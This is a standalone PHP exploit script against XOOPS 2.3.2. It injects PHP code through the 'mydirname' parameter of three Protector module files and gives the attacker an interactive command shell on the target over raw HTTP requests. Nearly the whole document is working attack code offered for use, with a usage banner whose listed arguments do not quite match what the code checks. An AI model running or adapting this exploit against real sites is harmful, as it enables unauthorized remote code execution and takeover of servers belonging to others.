|
#!/usr/bin/php -q <?php
/**************************************************************** * XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit * * by athos - staker[at]hotmail[dot]it * * http://xoops.org * * * * thanks to s3rg3770 and The:Paradox * * * * works with register globals on * * note: this vuln is a remote php code execution * * * * Directory (xoops_lib/modules/protector/) * * onupdate.php?mydirname=a(){} [PHP CODE] function v * * oninstall.php?mydirname=a(){} [PHP CODE] function v * * notification.php?mydirname=a(){} [PHP CODE] function v * ****************************************************************/
error_reporting(0);
list($cli,$host,$path,$num) = $argv;
if ($argc != 4) { print "\n+--------------------------------------------------------------+\n"; print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit |\n"; print "\r+--------------------------------------------------------------+\n"; print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n"; print "\rUsage: php xpl.php [host] [path]\n\n"; print "\rhost + localhost\n"; print "\rpath + /XOOPS\n"; exit; }
exploit();
function exploit() { global $num; if ($num > 3) { die("\n$num isn't a valid option\n"); } else { yeat_shell(); } }
function yeat_shell() { while (1) { echo "yeat[php-shell]~$: "; $exec = stripslashes(trim(fgets(STDIN))); if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n"); if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n"); if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");
print data_exec($exec); } }
function data_exec($exec) { global $host,$path,$num; if ($num == 1) { $urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}"; } if ($num == 2) { $urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}"; } if ($num == 3) { $urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}"; } $exec = urlencode($exec); $data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n"; $data .= "Host: {$host}\r\n"; $data .= "User-Agent: Lynx (textmode)\r\n"; $data .= "Connection: close\r\n\r\n"; $html = data_send ($host,$data);
return $html; }
function data_send ($host,$data) { if (!$sock = @fsockopen($host,80)) { die("Connection refused,try again!\n"); } fputs($sock,$data); while (!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; }
|
|
|